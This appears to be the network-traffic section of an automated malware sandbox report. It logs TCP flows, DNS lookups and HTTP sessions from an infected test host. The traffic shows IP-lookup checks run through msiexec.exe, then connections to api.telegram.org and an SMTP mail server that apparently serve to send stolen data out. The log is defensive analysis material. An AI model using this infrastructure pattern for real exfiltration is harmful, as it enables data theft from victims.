                                                                                                                          Oct 22, 2024 16:12:06.037841082 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.037913084 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.038499117 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.038511992 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.084841967 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.422159910 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.423546076 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.423578024 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.423661947 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.689630032 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.850636005 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.850739956 CEST44350013188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:13.851253033 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:13.855422020 CEST50013443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.136214972 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.142066002 CEST8050011193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.142143965 CEST5001180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.150264978 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.155678034 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.155852079 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.157345057 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.163189888 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.301712990 CEST8050014193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.303497076 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.303553104 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.303646088 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.304260015 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.304276943 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.350492001 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:14.930074930 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.931756020 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.931790113 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.993833065 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.995623112 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.995676041 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:14.996313095 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.996639967 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:14.996653080 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.038002014 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.102811098 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.102917910 CEST44350016188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.103060007 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.103847980 CEST50016443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.108191013 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.109652042 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.114392996 CEST8050014193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.114464998 CEST5001480192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.115089893 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.115166903 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.115284920 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.121911049 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.616266012 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.617804050 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.617842913 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.761840105 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.761962891 CEST44350017188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.762165070 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.762481928 CEST50017443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.765455961 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.766484022 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.772087097 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.772105932 CEST8050015193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.772175074 CEST5001580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.772255898 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.772387028 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:15.778278112 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.965929985 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.967536926 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.967576027 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:15.967683077 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.967869043 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:15.967885971 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.006752014 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.603888988 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.605917931 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.623147011 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.623198032 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.623334885 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.626904964 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.626924038 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.641383886 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.641405106 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.647362947 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.782891035 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.782985926 CEST44350020188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.783035994 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.783679962 CEST50020443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:16.786379099 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.787539005 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.792165041 CEST8050018193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.792222977 CEST5001880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.793081999 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:16.793143988 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.793247938 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:16.799166918 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.250384092 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.252175093 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.252216101 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.408703089 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.408791065 CEST44350021188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.408931971 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.409733057 CEST50021443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.449424982 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:17.455260992 CEST8050019193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.455339909 CEST5001980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:17.458755016 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:17.458811045 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.458867073 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:17.459371090 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:17.459402084 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.629726887 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.630950928 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.631011009 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.631078959 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.631367922 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:17.631380081 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:17.678606987 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:18.236041069 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.238035917 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:18.238059044 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.313426971 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.313527107 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.315289021 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.315304041 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.315592051 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.318336964 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.359337091 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.384808064 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.384910107 CEST44350024188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.384977102 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:18.385550022 CEST50024443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:18.463965893 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:18.464497089 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.464555025 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.464654922 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.465081930 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.465095043 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.470617056 CEST8050022193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.470736980 CEST5002280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:18.557230949 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.557298899 CEST44350023149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:18.557471037 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:18.559895992 CEST50023443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.319473028 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.319547892 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.322042942 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.322063923 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.322314024 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.324151039 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.367333889 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.566359997 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.566437960 CEST44350025149.154.167.220192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:19.566508055 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:19.608272076 CEST50025443192.168.2.6149.154.167.220
                                                                                                                          Oct 22, 2024 16:12:26.375925064 CEST4999980192.168.2.6193.122.6.168
Oct 22, 2024 16:12:26.847881079 CEST | 49998 | 80 | 192.168.2.6 | 193.122.6.168
Oct 22, 2024 16:12:27.633346081 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:27.634773970 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:27.640326023 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:27.640386105 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:27.642396927 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:27.642452002 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.396909952 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.397146940 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.397206068 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.397525072 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.402673960 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.403712034 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.674257040 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.677109003 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.725528955 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.725528955 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.752207994 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.752315998 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:28.757915020 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.758168936 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.997915030 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:28.999497890 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.001622915 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.005012989 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.007301092 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.010626078 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.251183033 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.251218081 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.251231909 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.251411915 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.253350019 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.253498077 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.253509045 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.253519058 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.253544092 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.253580093 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.322314024 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.323127985 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.327760935 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.328576088 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.568785906 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.569119930 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.571279049 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.571484089 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.577143908 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.577303886 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.816849947 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.816871881 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.817212105 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.819228888 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:29.822711945 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:29.824907064 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.062736034 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.063169003 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.065037966 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.065308094 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.068648100 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.070760965 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.360852003 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.360908031 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.361149073 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.361196995 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.366693974 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.366714954 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.606769085 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.606839895 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.607486963 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.607501984 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.613594055 CEST | 587 | 50028 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.613678932 CEST | 50028 | 587 | 192.168.2.6 | 213.165.67.102
Oct 22, 2024 16:12:30.615201950 CEST | 587 | 50027 | 213.165.67.102 | 192.168.2.6
Oct 22, 2024 16:12:30.615259886 CEST | 50027 | 587 | 192.168.2.6 | 213.165.67.102
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 16:11:52.558813095 CEST | 61000 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 16:11:52.566649914 CEST | 53 | 61000 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 16:11:53.908432961 CEST | 50668 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 16:11:53.916150093 CEST | 53 | 50668 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 16:12:00.009104013 CEST | 50180 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 16:12:00.017455101 CEST | 53 | 50180 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 16:12:03.623106003 CEST | 51594 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 16:12:03.633935928 CEST | 53 | 51594 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 16:12:17.450269938 CEST | 55009 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 16:12:17.458154917 CEST | 53 | 55009 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 16:12:27.623809099 CEST | 62610 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 16:12:27.632742882 CEST | 53 | 62610 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 16:11:52.558813095 CEST | 192.168.2.6 | 1.1.1.1 | 0x19cb | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:11:53.908432961 CEST | 192.168.2.6 | 1.1.1.1 | 0x44c0 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:00.009104013 CEST | 192.168.2.6 | 1.1.1.1 | 0x5de7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:03.623106003 CEST | 192.168.2.6 | 1.1.1.1 | 0xf0fa | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:17.450269938 CEST | 192.168.2.6 | 1.1.1.1 | 0xa9df | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:27.623809099 CEST | 192.168.2.6 | 1.1.1.1 | 0x6676 | Standard query (0) | smtp.ionos.es | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 16:11:52.566649914 CEST | 1.1.1.1 | 192.168.2.6 | 0x19cb | No error (0) | drive.google.com | - | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:11:53.916150093 CEST | 1.1.1.1 | 192.168.2.6 | 0x44c0 | No error (0) | drive.usercontent.google.com | - | 142.250.185.65 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:00.017455101 CEST | 1.1.1.1 | 192.168.2.6 | 0x5de7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 16:12:00.017455101 CEST | 1.1.1.1 | 192.168.2.6 | 0x5de7 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:00.017455101 CEST | 1.1.1.1 | 192.168.2.6 | 0x5de7 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:00.017455101 CEST | 1.1.1.1 | 192.168.2.6 | 0x5de7 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:00.017455101 CEST | 1.1.1.1 | 192.168.2.6 | 0x5de7 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:00.017455101 CEST | 1.1.1.1 | 192.168.2.6 | 0x5de7 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:03.633935928 CEST | 1.1.1.1 | 192.168.2.6 | 0xf0fa | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:03.633935928 CEST | 1.1.1.1 | 192.168.2.6 | 0xf0fa | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:17.458154917 CEST | 1.1.1.1 | 192.168.2.6 | 0xa9df | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:27.632742882 CEST | 1.1.1.1 | 192.168.2.6 | 0x6676 | No error (0) | smtp.ionos.es | - | 213.165.67.102 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:12:27.632742882 CEST | 1.1.1.1 | 192.168.2.6 | 0x6676 | No error (0) | smtp.ionos.es | - | 213.165.67.118 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:00.027342081 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:00.876904011 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:00 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: af95e6869811128c60c3efbcf679efb2
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 16:12:00.880763054 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 22, 2024 16:12:01.130698919 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:01 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c4c8aafa42c7a1dfc22f1d1adde75545
